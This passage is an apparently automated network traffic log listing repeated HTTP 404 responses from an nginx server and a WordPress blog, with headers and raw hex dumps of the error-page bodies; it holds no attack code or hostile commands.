3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 06 Sep 2024 07:05:27 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 06 Sep 2024 07:05:30 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 06 Sep 2024 07:05:32 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 06 Sep 2024 07:05:35 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:05:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11436Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 72 fd 73 db 46 96 ed cf 52 55 fe 87 36 5c 63 91 09 1b e0 97 28 89 12 99 75 9c cc 66 a6 92 b5 2b f6 ec bc ad d8 a5 6d 00 97 40 5b 8d 6e 4c 77 83 14 ad e8 7f 7f b7 01 7e 80 14 29 c9 b6 b2 ef d5 ca 26 09 dc 8f 73 cf 3d f7 5c 3c fb f1 f5 ab 77 ff f5 e6 27 92 da 4c 8c bf 39 bc 70 bf 44 30 99 8c 3c 90 f4 1f 6f bd 32 08 2c c6 df 83 8b 67 94 92 5f c1 32 42 69 f9 9e b9 e7 28 65 da 80 1d 79 ff 78 f7 57 7a ea ad 13 92 65 30 f2 a6 1c 66 b9 d2 d6 23 91 92 16 24 16 ce 78 6c d3 51 0c 53 1e 01 2d 5f 5a 84 4b 6e 39 13 d4 44 4c c0 a8 e3 ad e6 fd c2 e5 d5 72 9e 70 cf 1a c4 c8 cb b5 9a 70 01 1e 49 35 4c 46 5e 6a 6d 3e 0c 82 24 cb 13 5f e9 24 b8 9e c8 a0 b3 00 a9 35 71 99 84 2c ba da ea 4a 55 06 21 ff 64 8a 28 02 63 fc 50 28 04 c8 84 ce 23 3f 4f f3 35 93 7f be 21 3f a3 12 4b 32 96 5b 01 e3 37 2c 01 22 95 25 13 55 c8 98 bc 78 7e da ed 74 ce c9 cf 88 49 7e e0 9f c8 db 0a f5 22 a8 ca 0f 6b d2 1c 69 15 2a 6b 8e 56 c2 1c 65 ec 9a f2 0c 11 69 ae c1 09 37 14 4c 27 70 44 02 6c 5c ed 71 14 4b e3 0a 26 60 a3 f4 a8 da e5 68 e7 1a 8f 6b 9c e0 78 e3 27 4a 25 02 58 ce 8d 1f a9 6c ab d3 63 c2 82 96 cc a2 e2 76 9e e3 59 59 9e 0b 1e 31 cb 95 0c b4 31 df a1 60 98 72 3b 8e bc ed e5 c9 0b cd fe 55 a8 73 f2 57 80 b8 2e be d9 a3 fe 04 eb 02 ef 4f a1 f0 4a 65 19 6a 6d 1e cd 25 5a 34 d4 49 99 48 f3 dc 2e 68 58 b8 b6 c1 47 36 65 55 d4 1b 1f 06 df 92 8b 67 bf bf fa f1 e5 bb 97 bf 93 6f 83 c3 19 97 b1 9a f9 97 b3 1c 32 f5 91 bf 05 6b d1 89 86 8c c8 8d 17 32 03 ff d0 c2 1b 2e 48 bc 0f de 07 c6 9f 39 17 bf 0f 4a 2f 98 f7 c8 41 c3 fb a0 6c 7e 1f 74 8e fd b6 df 7b 1f 9c 74 af 4f ba ef 03 af e5 21 01 ec f7 73 99 e0 8b 99 26 5f 86 87 8d 25 1a fe fe 54 01 e2 93 7b 57 85 8e c0 1b de 78 e8 53 94 bb 6c 5b e0 97 f0 3b 54 7b 1f cc 72 ca 65 24 8a d8 cd fb 68 ca 40 d9 49 f1 98 80 4b fb 19 97 fe 47 f3 fd 14 f4 68 e0 0f fc 8e 77 7b 7b 8e d2 3d 23 ef 52 6e c8 84 0b 20 f8 cb 0a ab 68 02 12 34 4e 8e 9d 9a cf 26 85 8c dc d1 1b bc 25 9b 37 53 a6 89 6a 99 16 9c 2f e3 24 6a 40 f3 c6 ea 79 99 b3 a3 1b 53 e4 b9 d2 f6 1d 18 6b 86 d0 b2 3c c3 27 96 e5 c3 86 84 19 f9 11 81 9b fe 94 89 02 5e 4f 1a cd db 73 83 5b 20 cc 5b ab 34 ca e5 1b b0 7f c3 a5 1b aa f5 f7 b7 af ff c3 37 56 e3 f1 f8 64 de b0 cd e6 2d ea 11 a5 6e dc ed ed 6a 7c de c0 19 8e 1a f8 11 ae aa 7f 83 c8 36 da ad 76 0b df 99 44 9f f8 33 1e db 74 fd 9a 02 4f 52 db c4 00 6e 2d de e1 39 1b 16 cb db cd f3 6a 01 c7 Data Ascii: rsFRU6\c(uf+m@[nLw~)&s=\<w'L9pD0<o2,g_2Bi(eyxWze0f#$
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:05:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11436Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 72 fd 73 db 46 96 ed cf 52 55 fe 87 36 5c 63 91 09 1b e0 97 28 89 12 99 75 9c cc 66 a6 92 b5 2b f6 ec bc ad d8 a5 6d 00 97 40 5b 8d 6e 4c 77 83 14 ad e8 7f 7f b7 01 7e 80 14 29 c9 b6 b2 ef d5 ca 26 09 dc 8f 73 cf 3d f7 5c 3c fb f1 f5 ab 77 ff f5 e6 27 92 da 4c 8c bf 39 bc 70 bf 44 30 99 8c 3c 90 f4 1f 6f bd 32 08 2c c6 df 83 8b 67 94 92 5f c1 32 42 69 f9 9e b9 e7 28 65 da 80 1d 79 ff 78 f7 57 7a ea ad 13 92 65 30 f2 a6 1c 66 b9 d2 d6 23 91 92 16 24 16 ce 78 6c d3 51 0c 53 1e 01 2d 5f 5a 84 4b 6e 39 13 d4 44 4c c0 a8 e3 ad e6 fd c2 e5 d5 72 9e 70 cf 1a c4 c8 cb b5 9a 70 01 1e 49 35 4c 46 5e 6a 6d 3e 0c 82 24 cb 13 5f e9 24 b8 9e c8 a0 b3 00 a9 35 71 99 84 2c ba da ea 4a 55 06 21 ff 64 8a 28 02 63 fc 50 28 04 c8 84 ce 23 3f 4f f3 35 93 7f be 21 3f a3 12 4b 32 96 5b 01 e3 37 2c 01 22 95 25 13 55 c8 98 bc 78 7e da ed 74 ce c9 cf 88 49 7e e0 9f c8 db 0a f5 22 a8 ca 0f 6b d2 1c 69 15 2a 6b 8e 56 c2 1c 65 ec 9a f2 0c 11 69 ae c1 09 37 14 4c 27 70 44 02 6c 5c ed 71 14 4b e3 0a 26 60 a3 f4 a8 da e5 68 e7 1a 8f 6b 9c e0 78 e3 27 4a 25 02 58 ce 8d 1f a9 6c ab d3 63 c2 82 96 cc a2 e2 76 9e e3 59 59 9e 0b 1e 31 cb 95 0c b4 31 df a1 60 98 72 3b 8e bc ed e5 c9 0b cd fe 55 a8 73 f2 57 80 b8 2e be d9 a3 fe 04 eb 02 ef 4f a1 f0 4a 65 19 6a 6d 1e cd 25 5a 34 d4 49 99 48 f3 dc 2e 68 58 b8 b6 c1 47 36 65 55 d4 1b 1f 06 df 92 8b 67 bf bf fa f1 e5 bb 97 bf 93 6f 83 c3 19 97 b1 9a f9 97 b3 1c 32 f5 91 bf 05 6b d1 89 86 8c c8 8d 17 32 03 ff d0 c2 1b 2e 48 bc 0f de 07 c6 9f 39 17 bf 0f 4a 2f 98 f7 c8 41 c3 fb a0 6c 7e 1f 74 8e fd b6 df 7b 1f 9c 74 af 4f ba ef 03 af e5 21 01 ec f7 73 99 e0 8b 99 26 5f 86 87 8d 25 1a fe fe 54 01 e2 93 7b 57 85 8e c0 1b de 78 e8 53 94 bb 6c 5b e0 97 f0 3b 54 7b 1f cc 72 ca 65 24 8a d8 cd fb 68 ca 40 d9 49 f1 98 80 4b fb 19 97 fe 47 f3 fd 14 f4 68 e0 0f fc 8e 77 7b 7b 8e d2 3d 23 ef 52 6e c8 84 0b 20 f8 cb 0a ab 68 02 12 34 4e 8e 9d 9a cf 26 85 8c dc d1 1b bc 25 9b 37 53 a6 89 6a 99 16 9c 2f e3 24 6a 40 f3 c6 ea 79 99 b3 a3 1b 53 e4 b9 d2 f6 1d 18 6b 86 d0 b2 3c c3 27 96 e5 c3 86 84 19 f9 11 81 9b fe 94 89 02 5e 4f 1a cd db 73 83 5b 20 cc 5b ab 34 ca e5 1b b0 7f c3 a5 1b aa f5 f7 b7 af ff c3 37 56 e3 f1 f8 64 de b0 cd e6 2d ea 11 a5 6e dc ed ed 6a 7c de c0 19 8e 1a f8 11 ae aa 7f 83 c8 36 da ad 76 0b df 99 44 9f f8 33 1e db 74 fd 9a 02 4f 52 db c4 00 6e 2d de e1 39 1b 16 cb db cd f3 6a 01 c7 Data Ascii: rsFRU6\c(uf+m@[nLw~)&s=\<w'L9pD0<o2,g_2Bi(eyxWze0f#$
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:05:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://homebizsuccess.blog/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11436Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 72 fd 73 db 46 96 ed cf 52 55 fe 87 36 5c 63 91 09 1b e0 97 28 89 12 99 75 9c cc 66 a6 92 b5 2b f6 ec bc ad d8 a5 6d 00 97 40 5b 8d 6e 4c 77 83 14 ad e8 7f 7f b7 01 7e 80 14 29 c9 b6 b2 ef d5 ca 26 09 dc 8f 73 cf 3d f7 5c 3c fb f1 f5 ab 77 ff f5 e6 27 92 da 4c 8c bf 39 bc 70 bf 44 30 99 8c 3c 90 f4 1f 6f bd 32 08 2c c6 df 83 8b 67 94 92 5f c1 32 42 69 f9 9e b9 e7 28 65 da 80 1d 79 ff 78 f7 57 7a ea ad 13 92 65 30 f2 a6 1c 66 b9 d2 d6 23 91 92 16 24 16 ce 78 6c d3 51 0c 53 1e 